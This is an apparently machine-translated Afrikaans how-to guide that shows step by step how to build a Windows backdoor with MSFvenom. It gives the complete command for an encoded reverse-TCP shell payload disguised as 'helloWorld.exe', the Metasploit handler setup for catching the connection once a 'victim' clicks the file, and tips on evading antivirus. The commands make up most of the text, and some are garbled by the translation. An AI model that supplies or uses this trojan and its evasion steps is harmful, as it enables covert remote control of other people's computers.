'N Agterdeur word gebruik om veiligheidsmeganismes te omseil, dikwels in die geheim en meestal onopspoorbaar. Deur MSFvenom, die kombinasie van msfpayload en msfencode, te gebruik, is dit moontlik om 'n agterdeur te skep wat weer met die aanvaller verbind kan word deur gebruik te maak van omgekeerde dop -TCP. Om 'n agterdeur te ontwikkel, moet u die handtekening van u malware verander om antivirusprogrammatuur te vermy. Voltooi hierdie projek op 'n paar rekenaars waartoe u toestemming het, en in die proses leer u meer oor rekenaarsekuriteit en hoe hierdie soort agterdeur werk.
Stappe
Stap 1. Begin Kali en begin die terminale konsole
Stap 2. Tik ifconfig om die koppelvlak te vertoon en kyk na u IP -adres
Stap 3. Tik msfvenom -l encoders om die lys van encoders te wys
U sal x86/shikata_ga_nai as die encoder gebruik
Stap 4. Tik "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -platform vensters dui argitektuur aan om te gebruik.
- -p windows/shell/reverse_tcp dui die laaivragte aan om in te sluit.
- LHOST dui die IP -adres van die luisteraar aan.
- LPORT dui die luisteraarpoort aan.
- -b "\ x00" dui aan om slegte karakter (nul grepe) te vermy.
- -e x86/shikata_ga_nai dui die encoders se naam aan.
- -f exe> helloWorld.exe dui die formaatuitset aan.
Stap 5. Tik msfconsole om die Metasploit te aktiveer
Nou het u u agterdeur gegenereer. As die slagoffer op helloWorld.exe klik, word die doplading wat ingebed is, geaktiveer en weer 'n verbinding met u stelsel gemaak. Om die verbinding te ontvang, moet u die multi-hanteerder in Metasploit oopmaak en die laaivragte stel
Stap 6. Tik gebruik exploit/multi/handler
Stap 7. Tik set payload windows/shell/reverse_tcp
Stap 8. Tik wys opsies om die module na te gaan
Stap 9. Tik stel LHOST 192.168.48.129
'LHOST' dui die IP -adres van die luisteraar aan
Stap 10. Tik stel LPORT 4444
"LPORT" dui die luisteraarpoort aan
Stap 11. Tik hardloop en wag vir die verbinding vanaf die slagoffer se masjien
Stap 12. Wag totdat die slagoffer op helloWorld.exe klik
Dan word u suksesvol met die slagoffer se masjien verbind.
Wenke
- Die gebruik van -i in MSFvenom verteenwoordig die iterasies van die kodering. Soms kan meer herhalings help om die AV -sagteware te ontduik.
- U het geleer hoe u die agterdeur en gekodeerde kan genereer deur MSFvenom te gebruik, maar hierdie metode werk deesdae nie perfek teen sommige AV -sagteware nie. Die rede hiervoor is die uitvoeringsjablone in MSFvenom. Die AV -verkopers het die statiese handtekening van hierdie sjablone bygevoeg en soek dit net. Die oplossing vir hierdie probleem is om 'n ander uitvoeringssjabloon of ander gereedskap te gebruik.